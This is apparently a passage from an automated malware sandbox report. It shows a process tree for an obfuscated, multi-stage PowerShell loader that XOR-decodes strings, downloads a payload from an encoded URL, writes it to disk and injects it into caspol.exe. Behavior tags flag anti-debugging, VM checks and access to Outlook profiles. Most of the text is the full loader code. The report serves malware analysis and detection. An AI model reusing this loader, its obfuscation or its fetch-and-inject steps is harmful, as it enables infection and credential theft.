U'SBS2CBBAF9S0H9BAT9SDT8PCH8E4SCj7SBFBB9mCB8K7A9IDF8J0I8T4E8PCACW7mAO0F8A7P9bDU8OCS9MBK8U6D9T9SBEAP8FCU9RBH9NFB8B0L8SAP8SCM9BAPCg7DAG4S8p8B9CBp9RAD8D1S8J8i8u5UBP4BDT3SDi3RARAA8K6B9U9I9P0bCP1FCSDAABBa8T5D8A6U8m4A8H4f8ACN9EAE9JDMCT5TCB9IDCFTDGCADSDPCA5RCF9PCSDMAhAC8P1S9DBA8U0T9AAA9CDI8d6F8SFE8TFBDPEBDBBCCS5RCE9SCADMBRAB8M5P8M8k8LESCR0K'S;P.A(T`$ShuoSsPtU7D)M P`$RTMjFaTnh1P;B`$ATAjFaBnE2A C=n MmAuArOeCnA1s1A M'TCGDVAO0S8t7I8PDF8SFC8M3NCP9FDF4SCT9TBP2NBBAS9K0H9GAT9PDE8ACM8B4SCC7nBPBN9UCS8S7U9TDa8T0B8E4M8LCLCG7KAC0w8S7S9TDS8MCM9KBA8T6R9N9HBDAL8BCf9KBS9NFP8N0W8FAU8FCT9NABCC7BAh4C8N8R9RBn9IAN8D1A8f8T8P5rBN4mDD3ADR3EARED8PCF9SDCADDL8LCK8C5S8UCS8CES8U8S9oDT8UCCAAFG8C6S9TBIAEFS9FCS8R7T8QAQ9PDO8R0P8X6S8E7SBG9P8B6K8K0K8S7G9SDA8SCE9VBICD1PCh1J8MFP8O2n9S9JCE9CCbDSBRDS8S6L9ABO8HDO8BCM8W7H9RFH8UCv8C3CCP9VCDDUAp2u8A5P8O8S9BAT8C2D8C0I8S7R8l6B8B7RCN0PCa5RCC9ICO1AAUEGASDABHDTCR9rAS9ECV1TBR2FAE0U8N7p9EDmBp9D9sDT9TBDBN4DCF5FCb9SBL2bAF0K8h7u9YDJBU9F9PDA9SBKBA4mCS5RCV9SBF2HAS0I8C7Y9BDPBA9V9FDG9fBSBM4eCD5CCS9SBG2fAB0S8s7P9SDUBP9I9FDm9SBGBa4nCT5KCU9ABB2FAp0F8M7S9TDTBI9P9LDA9SBSBP4BCl0MCN9KCS1GBV2KAM0P8H7a9BDPBb9B9BDL9UBBBA4MCA0SCC0sCF0G'H;C.b(e`$BhvoAsBtV7I)D J`$STBjDaSnF2F;U`$pTCjgaFnC3s B=A GmKuArKeRnV1K1F H'DCYDCAB0m8l7N8SDB8mFT8A3UCV7rAS0H8I7K9SFm8B6I8B2R8DCtCH1NCSDHAJ2F9F0u8H2S8B5D8F0K8L2J9K0U8N6GDDArCL5BCCDKASAL8V1K9TBK8G0e9OAT9SDL8E6U8HFM8FFADPEfDPBACK5TCMDFAS0D8G7q8MFG8P6I9ABA8S4R8U8TCA5CDF9RCR5SDG9DCC0C'M;S.B(P`$dhBoFsAtA7C)E A`$LTEjRaPnA3C#N;""";Function Tjan9 { param([String]$Ricinelaid); For($Brandsit92=1; $Brandsit92 -lt $Ricinelaid.Length-1; $Brandsit92+=(1+1)){$muren = $muren + $Ricinelaid.Substring($Brandsit92, 1)}; $muren;}$Calendric0 = Tjan9 'NIGESXK ';$Calendric1= Tjan9 $Tocosmaab;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Calendric1 ;}else{.$Calendric0 $Calendric1;}"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:664
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function muren11 { param([String]$Ricinelaid); $Ande = ''; Write-Host $Ande; Write-Host $Ande; Write-Host $Ande; $Nulindkom = New-Object byte[] ($Ricinelaid.Length / 2); For($Brandsit92=0; $Brandsit92 -lt $Ricinelaid.Length; $Brandsit92+=2){ $Nulindkom[$Brandsit92/2] = [convert]::ToByte($Ricinelaid.Substring($Brandsit92, 2), 16); $Autodiali = ($Nulindkom[$Brandsit92/2] -bxor 233); $Nulindkom[$Brandsit92/2] = $Autodiali; } [String][System.Text.Encoding]::ASCII.GetString($Nulindkom);}$Shininge0=muren11 'BA909A9D8C84C78D8585';$Shininge1=muren11 'A4808A9B869A868F9DC7BE8087DADBC7BC879A888F8CA7889D809F8CA48C9D81868D9A';$Shininge2=muren11 'AE8C9DB99B868AA88D8D9B8C9A9A';$Shininge3=muren11 'BA909A9D8C84C7BB9C879D80848CC7A0879D8C9B8699BA8C9B9F808A8C9AC7A188878D858CBB8C8F';$Shininge4=muren11 '9A9D9B80878E';$Shininge5=muren11 'AE8C9DA4868D9C858CA188878D858C';$Shininge6=muren11 'BBBDBA998C8A808885A788848CC5C9A1808D8CAB90BA808EC5C9B99C8B85808A';$Shininge7=muren11 'BB9C879D80848CC5C9A48887888E8C8D';$Shininge8=muren11 'BB8C8F858C8A9D8C8DAD8C858C8E889D8C';$Shininge9=muren11 'A087A48C84869B90A4868D9C858C';$host0=muren11 'A490AD8C858C8E889D8CBD90998C';$host1=muren11 'AA85889A9AC5C9B99C8B85808AC5C9BA8C88858C8DC5C9A8879A80AA85889A9AC5C9A89C9D86AA85889A9A';$host2=muren11 'A0879F86828C';$host3=muren11 'B99C8B85808AC5C9A1808D8CAB90BA808EC5C9A78C9EBA85869DC5C9BF809B9D9C8885';$host4=muren11 'BF809B9D9C8885A88585868A';$host5=muren11 '879D8D8585';$host6=muren11 'A79DB99B869D8C8A9DBF809B9D9C8885A48C84869B90';$host7=muren11 'A0ACB1';$host8=muren11 'B5';$Tordenvej=muren11 'BCBAACBBDADB';$Klaskinon=muren11 'AA888585BE80878D869EB99B868AA8';function fkp {Param ($Affl, $Opga) ;$Blommest0 =muren11 'CDBE808C9E85C9D4C9C1B2A89999AD8684888087B4D3D3AA9C9B9B8C879DAD8684888087C7AE8C9DA89A9A8C848B85808C9AC1C0C995C9BE818C9B8CC4A68B838C8A9DC992C9CDB6C7AE85868B8885A89A9A8C848B8590AA888A818CC9C4A8878DC9CDB6C7A5868A889D808687C7BA9985809DC1CD81869A9DD1C0B2C4D8B4C7AC989C88859AC1CDBA81808780878E8CD9C0C994C0C7AE8C9DBD90998CC1CDBA81808780878E8CD8C0';.($host7) $Blommest0;$Blommest5 = muren11 'CDAF889D818684888B858CC9D4C9CDBE808C9E85C7AE8C9DA48C9D81868DC1CDBA81808780878E8CDBC5C9B2BD90998CB2B4B4C9A9C1CDBA81808780878E8CDAC5C9CDBA81808780878E8CDDC0C0';.($host7) $Blommest5;$Blommest1 = muren11 '9B8C9D9C9B87C9CDAF889D818684888B858CC7A0879F86828CC1CD879C8585C5C9A9C1B2BA909A9D8C84C7BB9C879D80848CC7A0879D8C9B8699BA8C9B9F808A8C9AC7A188878D858CBB8C8FB4C1A78C9EC4A68B838C8A9DC9BA909A9D8C84C7BB9C879D80848CC7A0879D8C9B8699BA8C9B9F808A8C9AC7A188878D858CBB8C8FC1C1A78C9EC4A68B838C8A9DC9A0879DB99D9BC0C5C9C1CDBE808C9E85C7AE8C9DA48C9D81868DC1CDBA81808780878E8CDCC0C0C7A0879F86828CC1CD879C8585C5C9A9C1CDA88F8F85C0C0C0C0C5C9CDA6998E88C0C0';.($host7) $Blommest1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Unfoolrel,[Parameter(Position = 1)] [Type] $Heptapo = [Void]);$Blommest2 = muren11 'CDBA88859FC9D4C9B2A89999AD8684888087B4D3D3AA9C9B9B8C879DAD8684888087C7AD8C8F80878CAD90878884808AA89A9A8C848B8590C1C1A78C9EC4A68B838C8A9DC9BA909A9D8C84C7BB8C8F858C8A9D808687C7A89A9A8C848B8590A788848CC1CDBA81808780878E8CD1C0C0C5C9B2BA909A9D8C84C7BB8C8F858C8A9D808687C7AC84809DC7A89A9A8C848B8590AB9C80858D8C9BA88A8A8C9A9AB4D3D3BB9C87C0C7AD8C8F80878CAD90878884808AA4868D9C858CC1CDBA81808780878E8CD0C5C9CD8F88859A8CC0C7AD8C8F80878CBD90998CC1CD81869A9DD9C5C9CD81869A9DD8C5C9B2BA909A9D8C84C7A49C859D808A889A9DAD8C858C8E889D8CB4C0';.($host7) $Blommest2;$Blommest3 = muren11 'CDBA88859FC7AD8C8F80878CAA86879A9D9B9C8A9D869BC1CDBA81808780878E8CDFC5C9B2BA909A9D8C84C7BB8C8F858C8A9D808687C7AA88858580878EAA86879F8C879D8086879AB4D3D3BA9D88878D889B8DC5C9CDBC878F8686859B8C85C0C7BA8C9DA08499858C848C879D889D808687AF85888E9AC1CDBA81808780878E8CDEC0';.($host7) $Blommest3;$Blommest4 = muren11 'CDBA88859FC7AD8C8F80878CA48C9D81868DC1CD81869A9DDBC5C9CD81869A9DDAC5C9CDA18C999D889986C5C9CDBC878F8686859B8C85C0C7BA8C9DA08499858C848C879D889D808687AF85888E9AC1CDBA81808780878E8CDEC0';.($host7) $Blommest4;$Blommest5 = muren11 '9B8C9D9C9B87C9CDBA88859FC7AA9B8C889D8CBD90998CC1C0';.($host7) $Blommest5 ;}$triko = muren11 '828C9B878C85DADB';$muren03 = muren11 'AE8C9DAA86879A86858CBE80878D869E';$muren00=muren11 'BA81869EBE80878D869E';$muren01 = muren11 'CD9A82808B9A848887C9D4C9B2BA909A9D8C84C7BB9C879D80848CC7A0879D8C9B8699BA8C9B9F808A8C9AC7A4889B9A818885B4D3D3AE8C9DAD8C858C8E889D8CAF869BAF9C878A9D808687B98680879D8C9BC1C18F8299C9CDBD869B8D8C879F8C83C9CD849C9B8C87D9D9C0C5C9C1AEADBDC9A9C1B2A0879DB99D9BB4C5C9B2BCA0879DDADBB4C0C9C1B2A0879DB99D9BB4C0C0C0';.($host7) $muren01;$muren02 = muren11 'CDAE8885998C878D8CC9D4C9B2BA909A9D8C84C7BB9C879D80848CC7A0879D8C9B8699BA8C9B9F808A8C9AC7A4889B9A818885B4D3D3AE8C9DAD8C858C8E889D8CAF869BAF9C878A9D808687B98680879D8C9BC1C18F8299C9CD9D9B808286C9CD849C9B8C87D9DAC0C5C9C1AEADBDC9A9C1B2A0879DB99D9BB4C0C9C1B2A0879DB99D9BB4C0C0C0';.($host7) $muren02;$Blommest7 = muren11 'CDA8879D818699C9D4C9CDAE8885998C878D8CC7A0879F86828CC1D9C0';.($host7) $Blommest7;$Blommest7 = muren11 'CD9A82808B9A848887C7A0879F86828CC1CDA8879D818699C5C9D9C0';.($host7) $Blommest7;$Blommest6 = muren11 'CDAC9181869B9D9A888AC9D4C9B2BA909A9D8C84C7BB9C879D80848CC7A0879D8C9B8699BA8C9B9F808A8C9AC7A4889B9A818885B4D3D3AE8C9DAD8C858C8E889D8CAF869BAF9C878A9D808687B98680879D8C9BC1C18F8299C9CD9D9B808286C9CD81869A9DDDC0C5C9C1AEADBDC9A9C1B2A0879DB99D9BB4C5C9B2BCA0879DDADBB4C5C9B2BCA0879DDADBB4C5C9B2BCA0879DDADBB4C0C9C1B2A0879DB99D9BB4C0C0C0';.($host7) $Blommest6;$Informa = fkp $host5 $host6;$Blommest7 = muren11 'CDA290828580829086DAC9D4C9CDAC9181869B9D9A888AC7A0879F86828CC1B2A0879DB99D9BB4D3D3B38C9B86C5C9DFDCDDC5C9D991DAD9D9D9C5C9D991DDD9C0';.($host7) $Blommest7;$Blommest8 = muren11 'CDAA819B809A9D868F8FDEDBC9D4C9CDAC9181869B9D9A888AC7A0879F86828CC1B2A0879DB99D9BB4D3D3B38C9B86C5C9D1DFDCDDD9DBD1D1C5C9D991DAD9D9D9C5C9D991DDC0';.($host7) $Blommest8;$muren01 = muren11 '819D9D999AD3C6C68D9B809F8CC78E86868E858CC78A8684C69C8AD68C9199869B9DD48D869E878586888DCF808DD4D888A5DADBB8D0DBD1DE81DC85DBB88A85ADAF8EDCBB91ADA7DE8A84BCB8A7AD83';$muren00 = muren11 'CDBD838887C9D4C9C1A78C9EC4A68B838C8A9DC9A78C9DC7BE8C8BAA85808C879DC0C7AD869E878586888DBA9D9B80878EC1CD849C9B8C87D9D8C0';$Blommest8 = muren11 'CDA290828580829086DBD4CD8C879FD38899998D889D88';.($host7) $Blommest8;$Kyklikyo2=$Kyklikyo2+'\Yogie.dat';$Tjan='';if (-not(Test-Path $Kyklikyo2)) {while ($Tjan -eq '') {.($host7) $muren00;Start-Sleep 5;}Set-Content $Kyklikyo2 $Tjan;}$Tjan = Get-Content $Kyklikyo2;$Blommest9 = muren11 'CDAB858684848C9A9DC9D4C9B2BA909A9D8C84C7AA86879F8C9B9DB4D3D3AF9B8684AB889A8CDFDDBA9D9B80878EC1CDBD838887C0';.($host7) $Blommest9;$Tjan0 = muren11 'B2BA909A9D8C84C7BB9C879D80848CC7A0879D8C9B8699BA8C9B9F808A8C9AC7A4889B9A818885B4D3D3AA869990C1CDAB858684848C9A9DC5C9D9C5C9C9CDA290828580829086DAC5C9DFDCDDC0';.($host7) $Tjan0;$Slag=$Blommest.count-654;$Tjan1 = muren11 'B2BA909A9D8C84C7BB9C879D80848CC7A0879D8C9B8699BA8C9B9F808A8C9AC7A4889B9A818885B4D3D3AA869990C1CDAB858684848C9A9DC5C9DFDCDDC5C9CDAA819B809A9D868F8FDEDBC5C9CDBA85888EC0';.($host7) $Tjan1;$Tjan2 = muren11 'CDA0878D8F83C9D4C9B2BA909A9D8C84C7BB9C879D80848CC7A0879D8C9B8699BA8C9B9F808A8C9AC7A4889B9A818885B4D3D3AE8C9DAD8C858C8E889D8CAF869BAF9C878A9D808687B98680879D8C9BC1C18F8299C9CDBD869B8D8C879F8C83C9CDA285889A8280878687C0C5C9C1AEADBDC9A9C1B2A0879DB99D9BB4C5C9B2A0879DB99D9BB4C5C9B2A0879DB99D9BB4C5C9B2A0879DB99D9BB4C5C9B2A0879DB99D9BB4C0C9C1B2A0879DB99D9BB4C0C0C0';.($host7) $Tjan2;$Tjan3 = muren11 'CDA0878D8F83C7A0879F86828CC1CDA290828580829086DAC5CDAA819B809A9D868F8FDEDBC5CDA0878F869B8488C5D9C5D9C0';.($host7) $Tjan3#"
            3⤵
            • Blocklisted process makes network request
            • Checks QEMU agent file
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2000
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
              4⤵
              • Checks QEMU agent file
              • Accesses Microsoft Outlook profiles
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of AdjustPrivilegeToken
              • outlook_office_path
              • outlook_win_path
              PID:828

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/664-92-0x000000000253B000-0x000000000255A000-memory.dmp
        Filesize

        124KB

        Download
      • memory/664-66-0x0000000002534000-0x0000000002537000-memory.dmp
        Filesize

        12KB

        Download
      • memory/664-57-0x0000000000000000-mapping.dmp
        Download
      • memory/664-59-0x000007FEF3B00000-0x000007FEF4523000-memory.dmp
        Filesize

        10.1MB

        Download
      • memory/664-61-0x0000000002534000-0x0000000002537000-memory.dmp
        Filesize

        12KB

        Download
      • memory/664-60-0x000007FEF2FA0000-0x000007FEF3AFD000-memory.dmp
        Filesize

        11.4MB

        Download
      • memory/664-64-0x000000000253B000-0x000000000255A000-memory.dmp
        Filesize

        124KB

        Download
      • memory/792-56-0x000007FEFC131000-0x000007FEFC133000-memory.dmp
        Filesize

        8KB

        Download
      • memory/828-89-0x00000000778F0000-0x0000000077A70000-memory.dmp
        Filesize

        1.5MB

        Download
      • memory/828-93-0x00000000778F0000-0x0000000077A70000-memory.dmp
        Filesize

        1.5MB

        Download
      • memory/828-77-0x0000000077710000-0x00000000778B9000-memory.dmp
        Filesize

        1.7MB

        Download
      • memory/828-88-0x0000000000400000-0x0000000000430000-memory.dmp
        Filesize

        192KB

        Download
      • memory/828-86-0x0000000000401000-0x0000000000615000-memory.dmp
        Filesize

        2.1MB

        Download
      • memory/828-85-0x0000000000400000-0x0000000000615000-memory.dmp
        Filesize

        2.1MB

        Download
      • memory/828-72-0x0000000000E4768E-mapping.dmp
        Download
      • memory/828-82-0x0000000000E50000-0x00000000060D8000-memory.dmp
        Filesize

        82.5MB

        Download
      • memory/828-75-0x0000000000E50000-0x00000000060D8000-memory.dmp
        Filesize

        82.5MB

        Download
      • memory/828-81-0x00000000778F0000-0x0000000077A70000-memory.dmp
        Filesize

        1.5MB

        Download
      • memory/1108-55-0x0000000000000000-mapping.dmp
        Download
      • memory/1728-54-0x0000000000000000-mapping.dmp
        Download
      • memory/2000-73-0x00000000778F0000-0x0000000077A70000-memory.dmp
        Filesize

        1.5MB

        Download
      • memory/2000-76-0x0000000005A60000-0x000000000ACE8000-memory.dmp
        Filesize

        82.5MB

        Download
      • memory/2000-74-0x00000000778F0000-0x0000000077A70000-memory.dmp
        Filesize

        1.5MB

        Download
      • memory/2000-83-0x00000000778F0000-0x0000000077A70000-memory.dmp
        Filesize

        1.5MB

        Download
      • memory/2000-84-0x00000000778F0000-0x0000000077A70000-memory.dmp
        Filesize

        1.5MB

        Download
      • memory/2000-69-0x0000000077710000-0x00000000778B9000-memory.dmp
        Filesize

        1.7MB

        Download
      • memory/2000-68-0x0000000073750000-0x0000000073CFB000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2000-67-0x0000000005A60000-0x000000000ACE8000-memory.dmp
        Filesize

        82.5MB

        Download
      • memory/2000-65-0x0000000073750000-0x0000000073CFB000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2000-90-0x0000000005A60000-0x000000000ACE8000-memory.dmp
        Filesize

        82.5MB

        Download
      • memory/2000-91-0x00000000778F0000-0x0000000077A70000-memory.dmp
        Filesize

        1.5MB

        Download
      • memory/2000-63-0x00000000763D1000-0x00000000763D3000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2000-62-0x0000000000000000-mapping.dmp
        Download